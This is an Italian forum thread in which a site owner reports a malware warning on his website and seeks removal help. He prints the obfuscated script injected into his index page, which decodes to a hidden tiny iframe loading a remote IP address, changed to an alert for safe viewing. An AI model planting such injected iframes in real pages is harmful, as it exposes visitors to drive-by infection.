Ciao a tutti,

ho appena riscontrato una certo Virus/Worm su un sito che gestisco nel tempo libero: http://www.lalocomotivaweb.it/

Segnalato da AVAST: Multi:Qtp-D

Se entrate con Firefox dovreste vedere un piccolo quadratino nero in home page che penso (dato che prima non c'era) possa in qualche modo essere in relazione.

ATTENZIONE!
Visualizzare solo con Firefox altrimenti con IE vi dovrebbe venire segnalato il virus.

Come faccio ad eliminarlo dal mio spazio sul server?

Esiste qualche tool specifico come si fa sul proprio PC di casa, o è meglio sentire il provider?

Purtroppo su internet non trovo informazioni a riguardo.

Grazie mille!

Forse l'ho beccato.

Nella index avevo questo script:


<script language="javascript">
alert( unescape( '%3C%69%66%72%61%6D%65%20%73%72%63%3D%27%68%74%74%70%3A%2F%2F%38%31%2E%32%39%2E%32%34%31%2E%32%33%36%2F%61%63%63%32%2F%61%6E%6E%61%2F%69%6E%64%65%78%2E%70%68%70%3F%69%64%3D%31%31%31%27%20%68%65%69%67%68%74%3D%27%31%35%27%20%77%69%64%74%68%3D%27%31%35%27%20%73%63%72%6F%6C%6C%69%6E%67%3D%27%6E%6F%27%20%66%72%61%6D%65%62%6F%72%64%65%72%3D%27%6E%6F%27%3E%3C%2F%69%66%72%61%6D%65%3E' ) );
</script>


Potete eseguirlo tranquillamente visto che ho cambiato con un semplice alert() quello che prima veniva scritto nel codice della pagina con il metodo document.write().

Pare richiami un IFRAME da un certo Server.

Avete qualche info in merito?

Rootkit Dialcall

Trovi molte informazioni su

http://www.pcalsicuro.com/main/

seeweb :rolleyes:
http://www.hwupgrade.it/forum/showthread.php?t=1542720